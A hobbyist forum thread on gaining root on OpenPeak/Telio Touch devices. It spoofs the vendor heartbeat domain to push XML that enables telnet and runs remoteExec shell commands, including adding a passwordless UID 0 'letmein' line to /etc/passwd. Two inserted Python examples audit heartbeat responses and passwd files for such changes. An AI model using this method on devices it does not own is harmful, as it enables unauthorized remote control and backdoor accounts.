How to break in / enable telnet on an OpenPeak 2 / Telio Touch with disabled USB boot and telnet

niwa
Posts: 8
Joined: Tue Oct 12, 2021 10:10 pm

Post by niwa »

I've finally been able to break in to my Telio Touch. After trying blind typing on all the USB sticks I could dig up, I realized that USB boot must have been disabled.
After reading through old posts I realized that it's sending a heartbeat HTTP request to https://services.openpeak.net/dms/devic ... MACADDRESS
The heartbeat rate seems to vary between a few seconds and a few minutes; it seems to slow down if it fails and run fast if it works.

@roobarb! posted the default response in another thread:

Code:

<?xml version="1.0" encoding="UTF-8"?>
<command><postDeviceDetails url="https://services.openpeak.net/dms/postDeviceDetails/12344844" method="post" /></command>

I disassembled the responsible file, libopdms.so, and found out that the command tag can contain one or more of the following commands:

Code:

<postDeviceDetails url="https://example.com/deviceDetails" />

Returns a long list of settings and data on the device, partitions, versions etc.

Code:

<downloadFirmware mode="" reboot="">
   <downloadURL>http://example.com/firmware_file.ext</downloadURL>
   <successURL>http://example.com/success</successURL>
   <failureURL>http://example.com/failure</failureURL>
   <notesURL>http://example.com/notes</notesURL>
</downloadFirmware>

Update firmware. Don't know what kind of file it expects, probably a .tgz file similar to what was used by the automatic updates.

Code:

<mediaDisplay contentType="application/x-shockwave-flash">
   <mediaURL>http://example.com/media.swf</mediaURL>
</mediaDisplay>

Can probably be used to start playback of media from a URL.

Code:

<motd />

Message of the day? Don't know what it does.

Code:

<remoteExec commandId="1" timeout="5">
   <callbackURL>http://example.com/callback</callbackURL>
   <shText>cp /mnt/sda1/passwd /etc/</shText>
</remoteExec>

Execute a shell command. The callback always tells me that the command timed out even if it was successful.

Code:

<publishMessage channel="" />

Don't know what this does.

Code:

<configuration>
   <device>
      <telnetEnabled>true</telnetEnabled>
   </device>
</configuration>

Change one of the settings in opservices.ini; can be used to enable telnet.


I've only tested postDeviceDetails, configuration and remoteExec.

To enable telnet, I first set up a web server and a DNS server to forward requests to services.openpeak.net to my web server.
I created a file on the server called /dms/device/heartbeat.
Then, to enable telnet I put this in the file:

Code:

<?xml version="1.0" encoding="UTF-8"?>
<command>
   <configuration>
      <device>
         <telnetEnabled>true</telnetEnabled>
      </device>
   </configuration>
</command>

I also had to create a new user. Because this is executed every few seconds, I didn't want to directly write to /etc/passwd because then many lines might be added and I don't know how Linux handles that.
I copied the file to a USB stick, edited the file on another computer and copied it back, using a combination of these commands in remoteExec:

Code:

umount /dev/sda1
mount -t vfat /dev/sda1 /mnt

Had to remount it as it's mounted as read only by the OS.

Code:

cp /etc/passwd /mnt/

Copy the file to the USB stick.

Added the following line to the end of the file:

Code:

letmein::0:0:root:/:/bin/sh

Code:

cp /mnt/passwd /etc/

Copy the file back.

After this I could log in using telnet with username letmein and no password.
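
Added example, not part of niwa's post or the device's own code: a Python check that a network owner could run over captured heartbeat responses to flag the commands listed above before they reach a stock device. The risk tiers, the function names and the rule that every URL should be HTTPS on services.openpeak.net are assumptions of this example; the sample response is constructed from the snippets in the post.

```python
import xml.etree.ElementTree as ET
from urllib.parse import urlparse

# Risk tiers are this example's assumption; the tag names come from the post.
RISK = {"remoteExec": "critical", "downloadFirmware": "critical",
        "configuration": "high", "mediaDisplay": "medium",
        "postDeviceDetails": "low", "motd": "low", "publishMessage": "low"}
EXPECTED_HOST = "services.openpeak.net"

# Constructed sample: the telnet setting plus a remoteExec with an off-host callback.
SAMPLE = """<?xml version="1.0" encoding="UTF-8"?>
<command>
  <configuration><device><telnetEnabled>true</telnetEnabled></device></configuration>
  <remoteExec commandId="1" timeout="5">
    <callbackURL>http://example.com/callback</callbackURL>
    <shText>cp /mnt/sda1/passwd /etc/</shText>
  </remoteExec>
</command>"""

def _settings(elem, path=""):
    """Flatten <configuration> into 'device/telnetEnabled=true' strings."""
    out = []
    for child in elem:
        here = f"{path}/{child.tag}" if path else child.tag
        out += _settings(child, here) if len(child) else [f"{here}={(child.text or '').strip()}"]
    return out

def _bad_urls(cmd):
    """URLs (url attribute or *URL children) that are cleartext or off the vendor host."""
    urls = [cmd.get("url")] + [c.text for c in cmd.iter() if c.tag.endswith("URL")]
    return [u.strip() for u in urls if u and (urlparse(u.strip()).scheme != "https"
            or urlparse(u.strip()).hostname != EXPECTED_HOST)]

def audit_heartbeat(xml_text):
    """Return one finding per command found in a captured heartbeat response."""
    if "<!DOCTYPE" in xml_text:  # refuse DTDs rather than expand entities
        return [{"tag": None, "risk": "unknown", "detail": ["DTD present"]}]
    try:
        root = ET.fromstring(xml_text.encode("utf-8"))
    except ET.ParseError as exc:
        return [{"tag": None, "risk": "unknown", "detail": [f"malformed XML: {exc}"]}]
    findings = []
    for cmd in root:
        detail = _settings(cmd) if cmd.tag == "configuration" else []
        if cmd.tag == "remoteExec":
            detail.append("sh: " + (cmd.findtext("shText") or "").strip())
        detail += ["untrusted URL: " + u for u in _bad_urls(cmd)]
        findings.append({"tag": cmd.tag, "risk": RISK.get(cmd.tag, "unknown"), "detail": detail})
    return findings
```

The stock response quoted at the top of the post yields a single low-risk finding with no detail; anything rated high or critical, or any tag not in the table, is worth alerting on.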
Paul Webster
Posts: 115
Joined: Mon Jul 18, 2011 7:56 am

Post by Paul Webster »

Excellent.
I wonder if this could mean that installations can be done without using reflash system.
DJWillis
Posts: 14
Joined: Wed Aug 24, 2011 8:39 pm

Post by DJWillis »

niwa,

Playing with this, thanks, on my test devices (a few stock OF1's and the Telio 38510) the heartbeats seem to come in regularly every 2 mins over Ethernet, on the button. Will check if they have some sort of back off on WiFi.

My setup is very simple (mongoose answering on 80 and 433, no cert, not even self signed, so it is a plain HTTP server on a custom port), and a basic split DNS setup on my side pushing services.openpeak.net to my internal server.

Moving on to getting stuff onto the device and playing a little more out of interest and I'll report back.
niwa
Posts: 8
Joined: Tue Oct 12, 2021 10:10 pm

Post by niwa »

Paul Webster wrote: Fri Oct 22, 2021 10:27 am
> Excellent.
> I wonder if this could mean that installations can be done without using reflash system.

I suppose it can be done with the downloadFirmware command, but don't know what the files should look like. Probably it's the same format as the automatic updates, but I wasn't able to find any examples. All I could find out about them is that they are .tgz and should contain a payload folder.

I flashed the Avaya ROM on mine and after that I could boot the reflash or any other USB stick.
DJWillis
Posts: 14
Joined: Wed Aug 24, 2011 8:39 pm

Post by DJWillis »

Hi niwa,

This worked a charm on my setup, a little split DNS and a simple web server was all that was needed. Ended up with a self signed cert on my setup but I don't think there is any attempt at cert (or even protocol) validation going on at all. It seems to respond just fine even if you leave a plain HTTP server running on port 443.

telnetEnabled worked on the 1st boot, I then tweaked the payload of the remoteExec stuff to suit what I wanted but that was a preference more than anything else.

It also seems to work on various other flavours of OpenPeak devices I have with stock OS's on the flash (as expected) so forms the basis of another way of opening up units that might be locked down :). Great to still be finding tweaks after so long.

downloadFirmware definitely looks promising for a way of getting a new payload onto a device. Will play more with that.

For info, in my case at least, once it gets something in heartbeat that has an actual command in it, it goes mad polling twice a second; before that, it seems to go into a semi-regular once-a-minute poll if it gets a response but no instructions.

Next up, flashing the EFI, I have done it on plenty of other OF2's so I think it may be worth the risk to get back to something with USB booting (so I can leave the internal flash alone to play more with this).

As an aside, I also have ended up doing something that may turn out to be daft, I now own openpeak.net. The reason behind this was simple, this hack exposes a really simple way to force a potentially unknown payload onto any stock or semi stock devices out in the wild still (and I suspect there is a surprising amount) and the security freak in me decided that one way to stop that happening is to control it. Also helped by the fact that I noticed whoever had been camping the domain and trying to get a huge fee for it had given up and let it lapse ;). I'll probably just point it at this forum and make a post about it but if anyone has better ideas or a community use for it (unbricking service, provided we can avoid abuse?), just let me know.
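
Added example, not part of the thread: a Python check an owner could run over a copy of a device's /etc/passwd to spot the kind of entry described in the first post (a second UID 0 account with an empty password field), plus the duplicate lines niwa was worried about. The function name and the sample file are constructed for this example; only the letmein line comes from the thread.

```python
# Constructed sample: stock-looking entries plus the line added in the first post.
SAMPLE_PASSWD = """root:x:0:0:root:/root:/bin/sh
nobody:x:99:99:nobody:/:/bin/false
letmein::0:0:root:/:/bin/sh
"""

def audit_passwd(text):
    """Return (username, reason) pairs for risky /etc/passwd entries."""
    findings, seen = [], set()
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((f"line {lineno}", "malformed entry"))
            continue
        name, passwd, uid, _gid, _gecos, _home, shell = fields
        if name in seen:
            # Repeated appends (for example one per heartbeat) show up here.
            findings.append((name, "duplicate entry"))
        seen.add(name)
        if uid == "0" and name != "root":
            findings.append((name, "extra UID 0 account"))
        # An empty shell field means the default shell, so it counts as a login shell.
        nologin = shell.endswith(("/false", "/nologin"))
        if passwd == "" and not nologin:
            findings.append((name, "empty password with login shell"))
    return findings
```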
niwa
Posts: 8
Joined: Tue Oct 12, 2021 10:10 pm

Post by niwa »

I did also consider buying the domain, but forgot about it :D
Didn't really know what to do with it, could be interesting to see how many devices are polling the heartbeat. Did play with the idea of an unlocking service and using the mediaDisplay function to inform that there's such a service, but I doubt I would ever actually do it.
roobarb!
Posts: 1675
Joined: Sat Mar 05, 2011 1:30 pm
Location: Salford, UK

Post by roobarb! »

DJWillis wrote: Sat Oct 23, 2021 4:45 pm
> As an aside, I also have ended up doing something that may turn out to be daft, I now own openpeak.net. The reason behind this was simple, this hack exposes a really simple way to force a potentially unknown payload onto any stock or semi stock devices out in the wild still (and I suspect there is a surprising amount) and the security freak in me decided that one way to stop that happening is to control it. Also helped by the fact that I noticed whoever had been camping the domain and trying to get a huge fee for it had given up and let it lapse ;). I'll probably just point it at this forum and make a post about it but if anyone has better ideas or a community use for it (unbricking service, provided we can avoid abuse?), just let me know.

This could be very useful; all of the updated firmware versions I've made (v30301 and later) have their heartbeat messages already redirected to "openbeak.net", on which I run a passive heartbeat server which prevents errors on the app pages and keeps their telephony service alive. It receives a remarkable amount of traffic, so goodness knows how many devices are out there still calling the original domain. I meant to register it myself and completely forgot to check up on its availability!

With what you have learned about the telnet unlock I think we could put something very useful together for those with locked devices. Want to sort something out?
DJWillis
Posts: 14
Joined: Wed Aug 24, 2011 8:39 pm

Post by DJWillis »

roobarb! wrote: Thu Oct 28, 2021 2:14 am
> With what you have learned about the telnet unlock I think we could put something very useful together for those with locked devices. Want to sort something out?

Yes, if you already have a heartbeat server set up, maybe we could point this domain onto that? Or I can easily host something similar. Will drop you a message.